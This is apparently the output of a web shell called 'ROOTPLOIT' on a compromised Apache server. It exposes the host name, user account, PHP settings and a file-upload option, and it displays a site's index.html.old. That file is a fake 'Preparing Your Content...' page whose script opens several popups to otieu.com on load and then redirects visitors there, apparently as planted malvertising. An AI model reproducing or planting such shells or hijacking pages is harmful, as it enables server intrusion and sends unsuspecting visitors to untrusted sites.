ROOTPLOIT
Server: Apache
System: Linux node6122.myfcloud.com 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User: bashacomputer (1004)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/bashacomputer/public_html/index.html.old
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Preparing Your Content...</title>
<style>
    body {
        background: linear-gradient(135deg, #0f2027, #203a43, #2c5364);
        color: #fff;
        font-family: Arial, sans-serif;
        text-align: center;
        height: 100vh;
        margin: 0;
        display: flex;
        flex-direction: column;
        justify-content: center;
    }

    h1 {
        font-size: 2.5em;
        margin-bottom: 20px;
    }

    .loader {
        border: 8px solid #fff;
        border-top: 8px solid #3498db;
        border-radius: 50%;
        width: 80px;
        height: 80px;
        animation: spin 1s linear infinite;
        margin: 0 auto;
    }

    @keyframes spin {
        0% { transform: rotate(0deg); }
        100% { transform: rotate(360deg); }
    }

    p {
        margin-top: 20px;
        font-size: 1.2em;
        opacity: 0.7;
    }
</style>

<script>
// Open popup ads
function openPopups() {
    window.open("https://otieu.com/4/9793499", "_blank");
    window.open("https://otieu.com/4/10126751", "_blank");
    window.open("https://otieu.com/4/10063087");
}

// Redirect main window
function redirectMain() {
    window.location.href = "https://otieu.com/4/10126751";
}

window.onload = function() {
    openPopups();
    setTimeout(redirectMain, 1000); // Redirect after 1.5 seconds
};
</script>
</head>

<body>
    <h1>Preparing Your Content...</h1>
    <div class="loader"></div>
    <p>Please wait while we load your content.</p>
</body>
</html>